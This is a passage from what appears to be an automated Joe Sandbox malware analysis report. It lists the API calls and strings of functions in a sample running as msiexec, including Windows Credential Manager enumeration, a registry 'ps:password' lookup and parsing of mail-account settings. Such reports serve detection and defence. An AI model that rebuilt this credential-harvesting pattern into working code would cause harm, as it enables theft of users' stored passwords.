                                                                                                    • LoadMenuA.USER32(?,?), ref: 00409589
                                                                                                      • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                                                      • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                                                      • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                                                      • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                                                                    • DestroyMenu.USER32(00000000), ref: 004095A7
                                                                                                    • sprintf.MSVCRT ref: 004095EB
                                                                                                    • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                                                                    • memset.MSVCRT ref: 0040961C
                                                                                                    • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                                                                    • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                                                                    • DestroyWindow.USER32(00000000), ref: 0040965C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                                    • String ID: caption$dialog_%d$menu_%d
                                                                                                    • API String ID: 3259144588-3822380221
                                                                                                    • Opcode ID: 28b324c1556d4b5440d18e0b4d206da1123046d85e66521c8e04ac1cff3212ab
                                                                                                    • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                                                                                    • Opcode Fuzzy Hash: 28b324c1556d4b5440d18e0b4d206da1123046d85e66521c8e04ac1cff3212ab
                                                                                                    • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                                                                                    Function 004045DB Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 41libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                    • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                    • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                    • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                    • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                    • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$Library$FreeLoad
                                                                                                    • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                    • API String ID: 2449869053-4258758744
                                                                                                    • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                    • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                                                                                    • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                    • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                                                                                    Function 00404235 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 100stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • wcsstr.MSVCRT ref: 0040426A
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                                                                    • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                                                                    • strchr.MSVCRT ref: 004042F6
                                                                                                    • strlen.MSVCRT ref: 0040430A
                                                                                                    • sprintf.MSVCRT ref: 0040432B
                                                                                                    • strchr.MSVCRT ref: 0040433C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                                    • String ID: %s@gmail.com$www.google.com
                                                                                                    • API String ID: 3866421160-4070641962
                                                                                                    • Opcode ID: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                                                                                                    • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                                                                    • Opcode Fuzzy Hash: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                                                                                                    • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                                                                    Function 00409731 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 69COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _mbscpy.MSVCRT(0045A448,00000000,00000000,00000000,?,?,00409862,00000000,?,00000000,00000104,?), ref: 00409749
                                                                                                    • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,00000000,00000000,?,?,00409862,00000000,?,00000000,00000104,?), ref: 00409759
                                                                                                      • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                                                                                                      • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,00000104,0044C52F,?,00001000,0045A448), ref: 00409355
                                                                                                      • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                                                                                                    • EnumResourceNamesA.KERNEL32(00000104,00000004,0040955A,00000000), ref: 0040978F
                                                                                                    • EnumResourceNamesA.KERNEL32(00000104,00000005,0040955A,00000000), ref: 00409799
                                                                                                    • _mbscpy.MSVCRT(0045A550,strings,?,00409862,00000000,?,00000000,00000104,?), ref: 004097A1
                                                                                                    • memset.MSVCRT ref: 004097BD
                                                                                                    • LoadStringA.USER32(00000104,00000000,?,00001000), ref: 004097D1
                                                                                                      • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                                    • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                                    • API String ID: 1035899707-3647959541
                                                                                                    • Opcode ID: a0ec869b2dd78c9688f5c4aeae5101ac8de8338f716e64c62a8758e97b5b0f37
                                                                                                    • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                                                                                                    • Opcode Fuzzy Hash: a0ec869b2dd78c9688f5c4aeae5101ac8de8338f716e64c62a8758e97b5b0f37
                                                                                                    • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                                                                                                    Function 0040E381 Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 129COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                                    • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                    • API String ID: 2360744853-2229823034
                                                                                                    • Opcode ID: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
                                                                                                    • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                                                                    • Opcode Fuzzy Hash: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
                                                                                                    • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                                                                    Function 004100CC Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • strchr.MSVCRT ref: 004100E4
                                                                                                    • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                      • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                      • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                      • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                    • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                                                                    • _mbscat.MSVCRT ref: 0041014D
                                                                                                    • memset.MSVCRT ref: 00410129
                                                                                                      • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                                                      • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                                                                    • memset.MSVCRT ref: 00410171
                                                                                                    • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                                                                    • _mbscat.MSVCRT ref: 00410197
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                                    • String ID: \systemroot
                                                                                                    • API String ID: 912701516-1821301763
                                                                                                    • Opcode ID: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                                                                                                    • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                                                                    • Opcode Fuzzy Hash: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                                                                                                    • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                                                                    Function 004196A1 Relevance: 15.3, APIs: 6, Strings: 4, Instructions: 321COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00412F93: strlen.MSVCRT ref: 00412FA1
                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041983C
                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041985B
                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041986D
                                                                                                    • memcpy.MSVCRT(?,-journal,0000000A,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 00419885
                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 004198A2
                                                                                                    • memcpy.MSVCRT(?,-wal,00000005,?,?,?,?,?,?,?,?,?,00000000,00000000,004067AF), ref: 004198BA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$strlen
                                                                                                    • String ID: -journal$-wal$immutable$nolock
                                                                                                    • API String ID: 2619041689-3408036318
                                                                                                    • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                    • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                                                                                                    • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                    • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                                                                                                    Function 004086E0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 155COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                    • wcslen.MSVCRT ref: 0040874A
                                                                                                    • wcsncmp.MSVCRT ref: 00408794
                                                                                                    • memset.MSVCRT ref: 0040882A
                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00408849
                                                                                                    • wcschr.MSVCRT ref: 0040889F
                                                                                                    • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$FreeLibraryLoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                                                                    • String ID: J$Microsoft_WinInet
                                                                                                    • API String ID: 3318079752-260894208
                                                                                                    • Opcode ID: f0bd6c6ea0acb8351c112a80c86d09cf3e17917a0d28c26bc0fcaaf70a278575
                                                                                                    • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                                                                                                    • Opcode Fuzzy Hash: f0bd6c6ea0acb8351c112a80c86d09cf3e17917a0d28c26bc0fcaaf70a278575
                                                                                                    • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                                                                                                    Function 0040F802 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 118registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040F84A
                                                                                                    • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                                                                                                    • LocalFree.KERNEL32(?), ref: 0040F92C
                                                                                                    • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                                                    • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Creds$ps:password
                                                                                                    • API String ID: 2290531041-1288872324
                                                                                                    • Opcode ID: 30fd5f6f20630edc1b24d3ff7a692dcad865f59df878495865e1d580aa018547
                                                                                                    • Instruction ID: 67353d5813bb88842fab764933eebe3fab3d63e3b23d31051d6557c10b379f88
                                                                                                    • Opcode Fuzzy Hash: 30fd5f6f20630edc1b24d3ff7a692dcad865f59df878495865e1d580aa018547
                                                                                                    • Instruction Fuzzy Hash: 71412BB6901209AFDB61DF95DC84EEFBBBCEB48715F0000B6F905E2150DA349A54CF64
                                                                                                    Function 004037CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004037EB
                                                                                                    • memset.MSVCRT ref: 004037FF
                                                                                                      • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                                                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                      • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                    • strchr.MSVCRT ref: 0040386E
                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                                                                                    • strlen.MSVCRT ref: 00403897
                                                                                                    • sprintf.MSVCRT ref: 004038B7
                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$_mbscpystrlen$memcpysprintfstrchr
                                                                                                    • String ID: %s@yahoo.com
                                                                                                    • API String ID: 2240714685-3288273942
                                                                                                    • Opcode ID: 5a56a1554c10d755001c1ca11538bf46cd5ff9b3743cfe338c5787e90ef4e93f
                                                                                                    • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                                                                                    • Opcode Fuzzy Hash: 5a56a1554c10d755001c1ca11538bf46cd5ff9b3743cfe338c5787e90ef4e93f
                                                                                                    • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59
                                                                                                    Function 0040966C Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                                    • _mbscpy.MSVCRT(0045A448,00000000,00000000,00000000,0040972B,00000000,?,00000000,00000104,?), ref: 00409686
                                                                                                    • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,00000000,00000000,0040972B,00000000,?,00000000,00000104,?), ref: 00409696
                                                                                                    • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                                                      • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                                    • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                    • API String ID: 888011440-2039793938
                                                                                                    • Opcode ID: bcaacaf8b0ae019c7a44cf7c189e97e1f6c6f5de2524552f312430b312ca54f0
                                                                                                    • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                                                                                    • Opcode Fuzzy Hash: bcaacaf8b0ae019c7a44cf7c189e97e1f6c6f5de2524552f312430b312ca54f0
                                                                                                    • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                                                                                    Function 00403166 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 100stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                                                    • strchr.MSVCRT ref: 0040327B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfileStringstrchr
                                                                                                    • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                                    • API String ID: 1348940319-1729847305
                                                                                                    • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                    • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                                                                    • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                    • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                                                                    Function 00411004 Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 60COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                                                                    • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                                                                    • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy
                                                                                                    • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                    • API String ID: 3510742995-3273207271
                                                                                                    • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                    • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                                                                    • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                    • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                                                                    Function 0040F460 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 180registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040F567
                                                                                                    • memset.MSVCRT ref: 0040F57F
                                                                                                      • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                                                      • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                      • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                    • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                                                                    • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: QueryValuememset$AddressFreeLibraryLoadLocalProc_mbscpy_mbsnbcatmemcpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 78143705-3916222277
                                                                                                    • Opcode ID: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
                                                                                                    • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                                                                    • Opcode Fuzzy Hash: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
                                                                                                    • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA
